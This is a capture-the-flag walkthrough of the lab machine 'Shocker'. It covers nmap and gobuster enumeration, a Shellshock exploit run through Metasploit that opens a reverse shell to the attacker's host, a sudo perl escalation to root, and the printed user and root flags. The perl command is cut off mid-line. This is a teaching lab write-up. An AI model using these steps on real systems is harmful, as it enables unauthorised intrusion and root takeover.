Shocker

As usual let's start with nmap:

nmap -sV -sC -p- 10.10.10.56

Port 80 is open so let's check the website:

Let's do a gobuster to check if we have any hidden directories:

gobuster dir - u http://10.10.10.56 -w /opy/useful/SecLists/Discovery/Web-Content/common.txt

We found a directory called /cgi-bin so let's do more gobuster on this directory:

gobuster dir -u 10.10.10.56/cgi-bin -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x php,html,txt,zip,cgi,sh,pl,py

We found 10.10.10.56/cgi-bin/user.sh

Let's check it out:

Let's save this file and check it out:

The name of the machine is Shocker, this reminds us of the Apache Shellshock.

Let's check if there is an exploit in Metasploit:

msfconsole

search shellshock

Let's try exploit/multi/http/apache_mod_cgi_bash_env_exec

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options

set RHOSTS 10.10.10.56

set LHOST 10.10.14.3

set TARGETURI /cgi-bin/user.sh

exploit

Great! It worked!

getuid

sysinfo

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..

cd ..

cd ..

ls

cd home

ls

cd shelly

ls

cat user.txt

2ec24e11320026d1e70ff3e16695b233

Congratulations! You got the user flag!

Privilege Escalation

Let's try the usual command for privilege escalation:

sudo -l

User shelly may run the following commands on Shocker:

/usr/bin/perl

Let's try to execute this command then:

sudo /usr/bin/perl -e 'exec "/bin/s

We get a shell!

whoami

Nice! We have successfully escalated our privileges to root!

Let's now upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..

cd ..

ls

cd root

ls

cat root.txt

52c2715605d70c7619030560dc1ca467

Congratulations! You got the root flag!